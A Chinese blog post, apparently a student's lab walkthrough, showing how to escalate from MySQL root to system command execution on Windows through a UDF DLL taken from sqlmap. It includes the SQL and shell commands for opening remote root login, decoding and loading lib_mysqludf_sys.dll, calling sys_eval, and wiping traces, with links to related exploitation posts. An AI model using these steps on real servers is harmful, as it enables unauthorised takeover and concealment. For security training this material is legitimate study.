mysql 5.5 udf提权_MySQL_UDF提权

最新推荐文章于 2024-03-15 21:59:47 发布
最新推荐文章于 2024-03-15 21:59:47 发布
阅读量643 收藏
点赞数
文章标签: mysql 5.5 udf提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31548723/article/details/113420331
版权

大三就快结束啦,也要轮到我找工作啦,结合网上的资料和自己的经验准备了一些材料,算是对自己技术方面的小小总结吧。趁这个机会查缺补漏做一些原来知道但没有动手试过的实验。

一、原理

udf 即 user defined function,文件后缀为.dll。通过在 udf 文件中定义新函数,可以对 mysql 的功能进行扩充,利用 mysql 账号 root 权限创建可以执行系统命令函数的 udf.dll 动态链接库,把权限从执行 sql 语句提升到执行系统命令。

使用 udf 分为三个步骤:

把含义自定义函数(如执行系统命令函数 sys_eval )的 dll 文件放入特定文件夹下

声明引入这个dll文件中的自定义函数

使用自定义的函数

二、前提

root权限(需要创建和删除自定义函数)

mysql < 5.1,udf.dll 文件在 win2003 下放置于 c:\windows\system32 目录,在 win2000下放置在 c:\winnt\system32 目录

mysql >= 5.1,udf.dll 文件放置在 mysql 安装目录的 lib\plugin 文件夹下(该目录默认是不存在的,需要使用 webshell 找到 mysql 的安装目录,并在安装目录下创建 lib\plugin 文件夹,然后将 udf.dll 文件导出到该目录)

三、提权

3.1实验环境

攻击机:win10

ip:192.168.34.1

靶机:win7

ip:192.168.34.130

攻击机在靶机写入一句话木马,蚁剑连接。

(mysql 远程登录报错 Host is not allowed to connect to this MySQL server 解决方法:在装有 mysql 的机器上登录 mysql -u root -p 密码(远程 phpmyadmin 也可以)

执行 use mysql;

执行 update user set host = '%' where user = 'root'; (这一句执行会报错,不用管它)

执行FLUSH PRIVILEGES;

)

3.2上传UDF

先判断数据库版本,符合 mysql >= 5.1 情况。

07a06ef8cbddc3e8e32908fb0b5421d6.png

sqlmap 中有 udf 文件,分为32位和64位,根据 mysql 的位数选择(不是靶机系统位数),命令 show variables like '%version_%'; 查看 mysql 位数。

41bbb055e906fd0170644f200130cf7c.png

sqlmap\data\udf\mysql\windows\32 目录下存放着32位的 lib_mysqludf_sys.dll_,但是 sqlmap 中自带的 shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用。可以利用sqlmap 自带的解码工具cloak.py,进入到 sqlmap\extra\cloak 目录下,执行命令:python2 cloak.py -d -i D:\Penetration\sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_

解码后在 sqlmap\data\udf\mysql\windows\32 文件夹下会生成 dll 文件。在 mysql 安装路径下的 lib 文件夹内创建 plugin 目录,上传 lib_mysqludf_sys.dll。

8e0bd9d5e11aa88ab2bac08718c5fcc8.png

3.3引入函数

需要创建 udf 中存在的函数,可以用 winhex 打开 dll 看一下有哪些函数可以创建。这里选择 sys_eval 函数。

sys_eval:执行任意命令,并将输出返回。sys_exec:执行任意命令,并将退出码返回。

d9f8219f8e03b0148bd4ce58db80fcef.png

引入自定义函数:create function sys_eval returns string soname "lib_mysqludf_sys.dll";

0bef26e69ca8e4da43631cc6e1aad932.png

3.4使用函数

验证一下:select * from mysql.func where name = 'sys_eval';

4b52d2b0893b41a45859079b4937a884.png

select sys_eval('calc'); 弹计算器实验一下,还可以新建账号加入管理员组等进行其它操作。

4724972c2dab695b97fa7f66628b3ae2.png

3.5清除痕迹

删除函数命令:

drop function sys_eval;

delete from mysql.func where name='sys_eval';

f0fab828a8bc33837fd0f5bd5d9b02c1.png

8853303a4b14e4ac7f7dff999b8e08bd.png

参考:

姜秀萍
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
mysql 5.5 提权,mysql提权udf提权
weixin_32085599的博客
03-17 334
弄了两三天的UDF提权复现,遇到各种坑,也尝试了在实际渗透场景中的应用,所以总结了部分经验。此篇文章主要涉及mysql数据库中udf提权的讲解、以及UDF提权可能涉及的问题。--目录结构--原理讲解0x00何谓UDF提权0x02 UDF提权步骤UDF(user defined function,即’用户自定义函数’),是mysql数据库的一个特性,允许用户写入自定义函数,对mysql功能进行扩充。...
mysql提权总结
weixin_45605374的博客
12-12 712
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
UDF提权
最新发布
tubug的博客
03-15 1102
MYSQL权限比较高的时候我们就可以利用UDF提权UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数)UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。
UDF 提权
震山的博客
08-07 1100
关于 UDF 提权的思考
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 1887
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
MYSQL UDF手动提权及自动化工具使用
qq_45373631的博客
11-22 2720
UDF手工提权及自动化工具使用
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
udf mysql c语言代码,欢迎大家使用
mysql数据库提权所需lib_mysqludf_sys_64.dll(64位)
10-03
提权必备,之后会出对应的提权教程
MySQL提权UDF提权(附带大马)
07-25 1663
Mysql提权UDF
mysql 5.0 提权_MYSQL提权方法
weixin_34580939的博客
01-27 183
cve-2016-6662 MYSQL提权分析MySQL <= 5.7.15 远程代码执行/ 提权 (0day)5.6.335.5.52Mysql分支的版本也受影响,包括:MariaDBPerconaDB创建bob用户,并赋予file,select,insert权限,创建用于实验的数据库activedb和表active_table将exp先写入tmp目录,并编译成so文件,需要...
【数据库提权MySQL UDF提权 (Window环境)
做自己喜欢的事,并将其发挥到极致!
03-16 1776
本文章仅记录某次内网渗透过程中遇到的MySQL 采用UDF提权等方式进行获取权限,文章中内容仅用于技术交流,切勿用于非授权下渗透攻击行为,慎重!!!UDF(Userdefined function)可以翻译为用户自定义函数,其为mysql的一个拓展接口,可以为Mysql增添一些函数,对MySQL的功能进行扩充,然后就可以在MySQL中进行使用这些函数了。
phpmyadmin mysql提权_Mysql+PHPmyadmin 提权技巧
weixin_32338107的博客
01-26 195
软件安装:装机软件必备包随着网络的普及,我们的生活越来越方便,但是网络安全也成了很多人面临的一个问题。特别是那些有着商业数据的企业电脑,更要注意上网安全常识,不然病毒会对我们造成严重的威胁。1:phpmyadmin后台拿webshellphpmyadmin爆路径方法:weburl+phpmyadmin/themes/darkblue_orange/layout.inc.phphttp://url...
mysql 5.5 udf提权_提权基础-----mysql-udf提权
weixin_39844267的博客
01-19 171
1.总结关于udf提权方法通过弱口令,爆破,网站配置文件等方式得到mysql数据库帐号密码,---还要能外连(1).将udf.dll代码的16进制数声明给my_udf_a变量set @my_udf_a=concat('',dll的16进制);(2).建表my_udf_data,字段为data,类型为longblob。create table my_udf_data(data LONGBLOB);(...
Mysql_UDF提权
极客神殿
02-04 1万+
Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\MySQL Server 5.
Mysql udf提权(Linux平台)
热门推荐
3569
12-17 2万+
http://vinc.top/2017/04/19/mysql-udf%E6%8F%90%E6%9D%83linux%E5%B9%B3%E5%8F%B0/ UDFMySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限 网上有些文章利用的是sqlmap-master\udf\mysq
Windows下利用MySQL UDF提权
甲方乙方
08-13 3765
Windows下服务器提权之利用第三方服务MySQL 可利用环境: web应用服务器权限较低MySQLsystem 权限 假设已经拿到webshell。。。 1、了解上传的大马功能,查询一些关于目标服务器的系统信息 2、whoami查看当前权限 3、在网站web目录下上传UDF漏洞利用脚本,进行提权。上传成功,访问该文件:uid为root,pwd为空 4、mysql
mysqludf提权
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值